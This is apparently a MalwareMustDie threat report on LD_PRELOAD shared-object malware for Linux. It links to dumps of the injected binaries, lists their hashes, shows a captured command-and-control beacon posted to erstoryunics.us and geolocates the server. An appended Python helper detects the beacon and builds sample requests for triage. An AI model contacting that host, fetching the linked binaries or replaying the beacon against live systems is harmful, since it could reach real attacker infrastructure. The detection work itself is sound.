LD_PRELOAD .SO ELF MALWARE ATTACK FROM ROMANIA

MalwareMustDie Jun 10th, 2014
#MalwareMustDie Report of .SO ELF Malware attack
#date: Wed Jun 11 06:38:13 JST 2014
 by @unixfreaxjp
# to: yin

// Reported Injected installation .SO Bins
http://gist.githubusercontent.com/anonymous/b8e64d8c0ed021361934/raw/b3cead071dbb104a6e6623e1235ef7398c4949c9/gistfile1.txt
http://gist.github.com/anonymous/ed69b3e5ed1ee6a1365a


// Additional reports.. attacker list & CNC call trapped by IDS..
http://gist.github.com/anonymous/9c3de834f09931588897
http://gist.github.com/anonymous/a8556208eb787168f35f
http://gist.github.com/anonymous/38c59ec3ccc4329d12ce

// extract the bins w/ template:
$ date
Wed Jun 11 04:12:11 JST 2014
$
$ php ./sodump-template.php
SO x32 dumped 26848
SO x64 dumped 27288
MO x32 dumped 26848
MO x64 dumped 27288
$
$ ls -alF
total 600
drwxrwxrwx   2 xxx xxx    512 Jun 11 04:12 ./
drwxrwxrwx  13 xxx xxx    512 Jun 11 03:59 ../
-rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 libworker1-32.so
-rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 libworker1-64.so
-rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 libworker2-32.so
-rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 libworker2-64.so

$ md5 lib*
MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233
MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233
MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21


$ file lib*
libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
$

// CNC:

POST /kuku/theend.php HTTP/1.0
Host: erstoryunics.us
Pragma: 1337
Content-Length: 84

R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,
HTTP/1.1 200 OK
Date: Tue, 10 Jun 2014 22:12:22 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 6
Connection: close
Content-Type: text/html; charset=UTF-8
R,200
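Added example, not part of the MalwareMustDie paste: a small Python triage helper that takes a raw HTTP request as an IDS or proxy would capture it and reports which indicators from the CNC call above it carries (the POST path, the Host header, the unusual `Pragma: 1337` header, and the `R,<date>,<arch>,...` body prefix), then splits the body into fields. The meaning I attach to the body fields (build date, architecture, system banner) is my own reading of the captured values, not a documented protocol; `build_request` is a helper of mine, and the three sample requests are constructed here, the first reusing the captured body verbatim.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Indicators copied from the CNC call captured in the report.
C2_PATH = "/kuku/theend.php"
C2_HOST = "erstoryunics.us"
C2_PRAGMA = "1337"
# Body prefix "R,<yyyymmdd>,<32|64>," as seen in the capture; how the
# fields are interpreted below is an assumption, not a documented format.
BODY_RE = re.compile(r"^R,(\d{8}),(32|64),")


@dataclass
class Beacon:
    build_date: str   # 2nd field, e.g. "20130826" (assumed meaning)
    arch: str         # 3rd field, "32" or "64" (assumed meaning)
    banner: str       # 6th field, uname-like system description (assumed)


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0]
    path = parts[1] if len(parts) > 1 else ""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.decode("latin-1", "replace")


def beacon_indicators(raw: bytes) -> List[str]:
    """Return the names of the C2 indicators present in the request."""
    method, path, headers, body = parse_request(raw)
    hits: List[str] = []
    if method == "POST" and path == C2_PATH:
        hits.append("path")
    if headers.get("host", "").lower() == C2_HOST:
        hits.append("host")
    if headers.get("pragma") == C2_PRAGMA:
        hits.append("pragma")
    if BODY_RE.match(body):
        hits.append("body")
    return hits


def parse_beacon_body(body: str) -> Optional[Beacon]:
    """Parse the comma-separated beacon body; None if it is not one."""
    if not BODY_RE.match(body):
        return None
    fields = body.split(",")
    return Beacon(build_date=fields[1], arch=fields[2],
                  banner=fields[5] if len(fields) > 5 else "")


def triage(raw: bytes) -> Tuple[str, List[str], Optional[Beacon]]:
    """All four indicators -> "c2-beacon"; the protocol fingerprint alone
    (Pragma value or body shape) -> "suspicious", because host and path are
    the parts an operator changes most cheaply; otherwise "clean"."""
    hits = beacon_indicators(raw)
    beacon = parse_beacon_body(parse_request(raw)[3])
    if len(hits) == 4:
        return "c2-beacon", hits, beacon
    if "pragma" in hits or "body" in hits:
        return "suspicious", hits, beacon
    return "clean", hits, beacon


def build_request(host: str, path: str, body: str,
                  pragma: Optional[str] = None) -> bytes:
    """Assemble a constructed raw POST with a correct Content-Length."""
    lines = [f"POST {path} HTTP/1.0", f"Host: {host}"]
    if pragma is not None:
        lines.append(f"Pragma: {pragma}")
    lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n" + body).encode("latin-1")


# Constructed samples: the first reuses the body captured in the report, the
# second is the same beacon shape sent to a different host and path, the
# third is an ordinary form post.
SAMPLE_C2 = build_request(
    C2_HOST, C2_PATH,
    "R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,",
    C2_PRAGMA)
SAMPLE_MOVED = build_request("other.example", "/x/y.php",
                             "R,20130826,32,0,,Linux,", C2_PRAGMA)
SAMPLE_BENIGN = build_request("www.example.com", "/login", "user=alice&pw=x")

if __name__ == "__main__":
    for name, req in (("c2", SAMPLE_C2), ("moved", SAMPLE_MOVED),
                      ("benign", SAMPLE_BENIGN)):
        print(name, *triage(req))
```

Matching on the `Pragma: 1337` value and the body shape separately from the host and path is deliberate: the domain in the report can be swapped by the operator at any time, while the client's own request format tends to survive across campaigns, so a rule that keys only on `erstoryunics.us` goes stale first.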

// CNC INFO (NETWORK & GEOIP)

$ echo `dig +short erstoryunics.us`|bash origin.sh
Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL
IP Address, City, Country Name, Latitude, longitude, Time Zone
89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest

---
#MalwareMustDie!!